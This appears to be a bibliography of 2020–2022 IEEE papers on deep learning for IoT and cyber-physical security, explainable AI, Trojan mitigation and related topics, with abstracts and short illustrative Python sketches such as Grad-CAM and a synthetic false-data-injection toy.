Cyber-Physical Systems (CPS), which contain devices to aid with physical infrastructure activities, comprise sensors, actuators, control units, and physical objects. CPS sends messages to physical devices to carry out computational operations. CPS mainly deals with the interplay between cyber and physical environments. The real-time network data acquired in physical space is stored there, and the connection becomes sophisticated. CPS incorporates cyber and physical technologies at all phases. Cyber-Physical Systems are a crucial component of Internet of Things (IoT) technology. CPS is a traditional concept that brings together the physical and digital worlds we inhabit. Nevertheless, CPS has several difficulties that are likely to jeopardise our lives immediately, and its numerous levels are all tied to immediate threats, therefore necessitating a look at CPS security. Due to the inclusion of IoT devices in a wide variety of applications, the security and privacy of users are key considerations. The rising level of cyber threats has left current security and privacy procedures insufficient. As a result, hackers can treat every person on the Internet as a product. Deep Learning (DL) methods are therefore utilised to provide accurate outputs from big, complex databases, where the outputs generated can be used to forecast and discover vulnerabilities in IoT systems that handle medical data. Cyber-physical systems need anomaly detection to be secure. However, the rising sophistication of CPSs and more complex attacks mean that typical anomaly detection approaches are unsuitable for addressing these difficulties, since they are simply overwhelmed by the volume of data and the necessity for domain-specific knowledge. Attacks such as DoS and DDoS that impact network performance also need to be avoided. In this paper, an effective Network Cluster Reliability Model with enhanced security and privacy levels for IoT data for Anomaly Detection (NSRM-AD) using a deep learning model is proposed. The security levels of the proposed model are contrasted with those of existing models, and the results show that the proposed model performs accurately.
2022-12-01
Srikanth, K S, Ramesh, T K, Palaniswamy, Suja, Srinivasan, Ranganathan.  2022.  XAI based model evaluation by applying domain knowledge. 2022 IEEE International Conference on Electronics, Computing and Communication Technologies (CONECCT). :1–6.
Artificial intelligence (AI) is used in decision support systems which learn and perceive features as a function of the number of layers and the weights computed during training. Due to their inherent black-box nature, it is insufficient to consider accuracy, precision, and recall as metrics for evaluating a model's performance. Domain knowledge is also essential to identify the features considered significant by the model in arriving at its decision. In this paper, we consider a use case of face mask recognition to explain the application and benefits of XAI. Eight models used to solve the face mask recognition problem were selected. Grad-CAM Explainable AI (XAI) is used to explain the state-of-the-art models. Models that selected incorrect features were eliminated even though they had high accuracy. Domain knowledge relevant to face mask recognition, viz., facial feature importance, is applied to identify the model that picked the most appropriate features to arrive at the decision. We demonstrate that models with high accuracy need not necessarily select the right features. In applications requiring rapid deployment, this method can act as a deciding factor in shortlisting models, with a guarantee that the models are looking at the right features for arriving at the classification. Furthermore, the outcomes of the model can be explained to the user, enhancing their confidence in the AI model being deployed in the field.
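For reference, the Grad-CAM map itself can be computed with one forward pass and one gradient call. The sketch below uses an untrained torchvision ResNet-18 and a random tensor as stand-ins for the paper's eight face-mask models and their inputs.

import torch
from torchvision import models

model = models.resnet18(weights=None).eval()     # untrained stand-in model
acts = {}
model.layer4.register_forward_hook(lambda m, i, o: acts.update(a=o))

x = torch.randn(1, 3, 224, 224)                  # stand-in for an input image
score = model(x)[0].max()                        # top-class logit
grad = torch.autograd.grad(score, acts["a"])[0]  # d(score)/d(activations)

weights = grad.mean(dim=(2, 3), keepdim=True)    # per-channel importance
cam = torch.relu((weights * acts["a"]).sum(1)).squeeze()
print(cam.shape)                                 # 7x7 coarse relevance map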
Yu, Jialin, Cristea, Alexandra I., Harit, Anoushka, Sun, Zhongtian, Aduragba, Olanrewaju Tahir, Shi, Lei, Moubayed, Noura Al.  2022.  INTERACTION: A Generative XAI Framework for Natural Language Inference Explanations. 2022 International Joint Conference on Neural Networks (IJCNN). :1–8.
XAI with natural language processing aims to produce human-readable explanations as evidence for AI decision-making, which addresses explainability and transparency. However, from an HCI perspective, the current approaches only focus on delivering a single explanation, which fails to account for the diversity of human thoughts and experiences in language. This paper thus addresses this gap, by proposing a generative XAI framework, INTERACTION (explain aNd predicT thEn queRy with contextuAl CondiTional varIational autO-eNcoder). Our novel framework presents explanation in two steps: (step one) Explanation and Label Prediction; and (step two) Diverse Evidence Generation. We conduct intensive experiments with the Transformer architecture on a benchmark dataset, e-SNLI [1]. Our method achieves competitive or better performance against state-of-the-art baseline models on explanation generation (up to 4.7% gain in BLEU) and prediction (up to 4.4% gain in accuracy) in step one; it can also generate multiple diverse explanations in step two.
2022-11-08
Mode, Gautam Raj, Calyam, Prasad, Hoque, Khaza Anuarul.  2020.  Impact of False Data Injection Attacks on Deep Learning Enabled Predictive Analytics. NOMS 2020 - 2020 IEEE/IFIP Network Operations and Management Symposium. :1–7.
Industry 4.0 is the latest industrial revolution, primarily merging automation with advanced manufacturing to reduce direct human effort and resources. Predictive maintenance (PdM) is an Industry 4.0 solution which facilitates predicting faults in a component or a system powered by state-of-the-art machine learning (ML) algorithms (especially deep learning algorithms) and Internet-of-Things (IoT) sensors. However, IoT sensors and deep learning (DL) algorithms are both known for their vulnerabilities to cyber-attacks. In the context of PdM systems, such attacks can have catastrophic consequences as they are hard to detect due to the nature of the attack. To date, the majority of the published literature focuses on the accuracy of DL-enabled PdM systems and often ignores the effect of such attacks. In this paper, we demonstrate the effect of IoT sensor attacks (in the form of false data injection attacks) on a PdM system. At first, we use three state-of-the-art DL algorithms, specifically, Long Short-Term Memory (LSTM), Gated Recurrent Unit (GRU), and Convolutional Neural Network (CNN), for predicting the Remaining Useful Life (RUL) of a turbofan engine using NASA's C-MAPSS dataset. The obtained results show that the GRU-based PdM model outperforms some of the recent literature on RUL prediction using the C-MAPSS dataset. Afterward, we model and apply two different types of false data injection attacks (FDIA), specifically, continuous and interim FDIAs, on turbofan engine sensor data and evaluate their impact on CNN-, LSTM-, and GRU-based PdM systems. The obtained results demonstrate that FDI attacks on even a few IoT sensors can strongly degrade the RUL prediction in all cases. However, the GRU-based PdM model performs better in terms of accuracy and resiliency to FDIA. Lastly, we perform a study on the GRU-based PdM model using four different GRU networks with different sequence lengths. Our experiments reveal an interesting relationship between accuracy, resiliency, and sequence length for GRU-based PdM models.
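The two attack shapes are easy to reproduce on a single sensor channel. The signal, bias, and window below are invented for illustration; the paper defines its own FDIA models over C-MAPSS sensor channels.

import numpy as np

def continuous_fdia(signal, start, bias):
    # Bias every reading from `start` onward.
    out = signal.copy()
    out[start:] += bias
    return out

def interim_fdia(signal, start, stop, bias):
    # Bias only a bounded window, then return to normal readings.
    out = signal.copy()
    out[start:stop] += bias
    return out

t = np.linspace(0, 10, 200)
sensor = np.sin(t) + 0.05 * np.random.default_rng(0).normal(size=t.size)
attacked_cont = continuous_fdia(sensor, start=120, bias=0.4)
attacked_int = interim_fdia(sensor, start=80, stop=110, bias=0.4)
print(attacked_cont[119:122].round(2), attacked_int[[79, 90, 115]].round(2))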
Javaheripi, Mojan, Samragh, Mohammad, Fields, Gregory, Javidi, Tara, Koushanfar, Farinaz.  2020.  CleaNN: Accelerated Trojan Shield for Embedded Neural Networks. 2020 IEEE/ACM International Conference On Computer Aided Design (ICCAD). :1–9.
We propose CleaNN, the first end-to-end framework that enables online mitigation of Trojans for embedded Deep Neural Network (DNN) applications. A Trojan attack works by injecting a backdoor in the DNN while training; during inference, the Trojan can be activated by the specific backdoor trigger. What differentiates CleaNN from prior work is its lightweight methodology, which recovers the ground-truth class of Trojan samples without the need for labeled data, model retraining, or prior assumptions on the trigger or the attack. We leverage dictionary learning and sparse approximation to characterize the statistical behavior of benign data and identify Trojan triggers. CleaNN is devised based on algorithm/hardware co-design and is equipped with specialized hardware to enable efficient real-time execution on resource-constrained embedded platforms. Proof-of-concept evaluations of CleaNN for state-of-the-art Neural Trojan attacks on visual benchmarks demonstrate its competitive advantage in terms of attack resiliency and execution overhead.
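The benign-dictionary idea can be sketched with scikit-learn: fit a dictionary on benign feature vectors, then flag inputs whose sparse reconstruction error is large. The data shapes, sparsity level, and perturbation below are our own stand-ins, not CleaNN's actual configuration.

import numpy as np
from sklearn.decomposition import DictionaryLearning

rng = np.random.default_rng(0)
benign = rng.normal(size=(500, 64))        # stand-in benign patch features
dico = DictionaryLearning(n_components=32, transform_algorithm="omp",
                          transform_n_nonzero_coefs=5, max_iter=20,
                          random_state=0).fit(benign)

def reconstruction_error(x):
    # Error of the best 5-atom sparse approximation under the benign dictionary.
    code = dico.transform(x.reshape(1, -1))
    return float(np.linalg.norm(x - code @ dico.components_))

print(reconstruction_error(benign[0]))      # small: fits the benign dictionary
print(reconstruction_error(benign[0] + 5))  # much larger: trigger-like outlier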
Wshah, Safwan, Shadid, Reem, Wu, Yuhao, Matar, Mustafa, Xu, Beilei, Wu, Wencheng, Lin, Lei, Elmoudi, Ramadan.  2020.  Deep Learning for Model Parameter Calibration in Power Systems. 2020 IEEE International Conference on Power Systems Technology (POWERCON). :1–6.
In power systems, having accurate device models is crucial for grid reliability, availability, and resiliency. Existing model calibration methods based on mathematical approaches often lead to multiple solutions due to the ill-posed nature of the problem, which would require further interventions from the field engineers in order to select the optimal solution. In this paper, we present a novel deep-learning-based approach for model parameter calibration in power systems. Our study focused on the generator model as an example. We studied several deep-learning-based approaches including 1-D Convolutional Neural Network (CNN), Long Short-Term Memory (LSTM), and Gated Recurrent Units (GRU), which were trained to estimate model parameters using simulated Phasor Measurement Unit (PMU) data. Quantitative evaluations showed that our proposed methods can achieve high accuracy in estimating the model parameters, i.e., achieved a 0.0079 MSE on the testing dataset. We consider these promising results to be the basis for further exploration and development of advanced tools for model validation and calibration.
Shomron, Gil, Weiser, Uri.  2020.  Non-Blocking Simultaneous Multithreading: Embracing the Resiliency of Deep Neural Networks. 2020 53rd Annual IEEE/ACM International Symposium on Microarchitecture (MICRO). :256–269.
Deep neural networks (DNNs) are known for their inability to utilize underlying hardware resources due to hardware susceptibility to sparse activations and weights. Even in finer granularities, many of the non-zero values hold a portion of zero-valued bits that may cause inefficiencies when executed on hardware. Inspired by conventional CPU simultaneous multithreading (SMT) that increases computer resource utilization by sharing them across several threads, we propose non-blocking SMT (NB-SMT) designated for DNN accelerators. Like conventional SMT, NB-SMT shares hardware resources among several execution flows. Yet, unlike SMT, NB-SMT is non-blocking, as it handles structural hazards by exploiting the algorithmic resiliency of DNNs. Instead of opportunistically dispatching instructions while they wait in a reservation station for available hardware, NB-SMT temporarily reduces the computation precision to accommodate all threads at once, enabling a non-blocking operation. We demonstrate NB-SMT applicability using SySMT, an NB-SMT-enabled output-stationary systolic array (OS-SA). Compared with a conventional OS-SA, a 2-threaded SySMT consumes 1.4× the area and delivers 2× speedup with 33% energy savings and less than 1% accuracy degradation of state-of-the-art CNNs with ImageNet. A 4-threaded SySMT consumes 2.5× the area and delivers, for example, 3.4× speedup and 39% energy savings with 1% accuracy degradation of a 40%-pruned ResNet-18.